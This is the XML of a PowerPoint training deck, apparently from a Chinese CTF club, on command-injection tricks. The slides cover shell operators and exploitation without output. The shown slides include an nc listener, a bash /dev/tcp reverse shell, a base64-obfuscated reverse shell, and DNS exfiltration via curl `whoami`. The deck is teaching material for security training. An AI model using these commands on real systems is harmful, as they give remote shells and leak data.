        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1155700" y="1233170"/>
            <a:ext cx="9695815" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：表示任务在后台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：前面的成功了，后面的才</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：管道符，将前一个命令的输出，作为后一个命令的输入。典例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ls | grep flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：前面成功了，后面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不执行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：表示一条命令的结束，可以执行多条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>命令</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61110" y="497205"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>无回显利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310005" y="1305560"/>
            <a:ext cx="10747375" cy="4246245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- sleep(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断是否执行成功；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>公网服务器（需要靶机有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>尝试反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>nc -lvp 7777</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>bash -i &gt;&amp; /dev/tcp/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ip/7777 0&gt;&amp;1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- bash -c "{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yMS4xMzIvNzc3OCAwPiYx}|{base64,-d}|{bash,-i}"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>外带</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>curl `whoami`.xxx.xx.xx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>；反引号包裹的内容会被作为命令先执行，然后再</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>拼接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>http://ceye.io/    https://dnslog.cn/	burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自带</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>写文件到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ls | tee a #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的结果输入文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/tags/tag1.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst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 name="ISLIDE.THEME" val="1ca27200-b45a-4bf5-9f77-d1a92f71ef71"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiZmQ2ZDMxZjk5ZTg1Y2ZmN2Y1ODkwNDQxODA3NGViOTIifQ=="/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Designed by iSlide">
  <a:themeElements>
    <a:clrScheme name="iSlide">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="44546A"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E7E6E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="D40001"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="8E0101"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="3B0202"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="4E4D4D"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="909090"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="A8A8A8"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0563C1"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="954F72"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="自定义 3">
      <a:majorFont>
        <a:latin typeface="JetBrains Mono"/>
        <a:ea typeface="微软雅黑"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="JetBrains Mono"/>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BITs2Sys PPT模板</Template>
  <TotalTime>0</TotalTime>
  <Words>6391</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>386</Paragraphs>
  <Slides>49</Slides>
  <Notes>42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49</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="58" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>JetBrains Mono</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>Designed by iSlide</vt:lpstr>
      <vt:lpstr>BITs2Sys招新培训</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>1.web基础第二次培训</vt:lpstr>
      <vt:lpstr>1.1.RCE Trick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1.2.SSRF</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1.3.php反序列化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1.4.Java安全基础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Manager>BITs2Sys</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Nuo Zhang</dc:creator>
  <cp:lastModifiedBy>1diOt9</cp:lastModifiedBy>
  <cp:revision>271</cp:revision>
  <cp:lastPrinted>2023-06-15T16:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-18T10:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-12T09:28:25Z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1ca27200-b45a-4bf5-9f77-d1a92f71ef71</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>233B726EDF7D4F64B21326A439A48020_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.22529</vt:lpwstr>
  </property>
</Properties>
</file>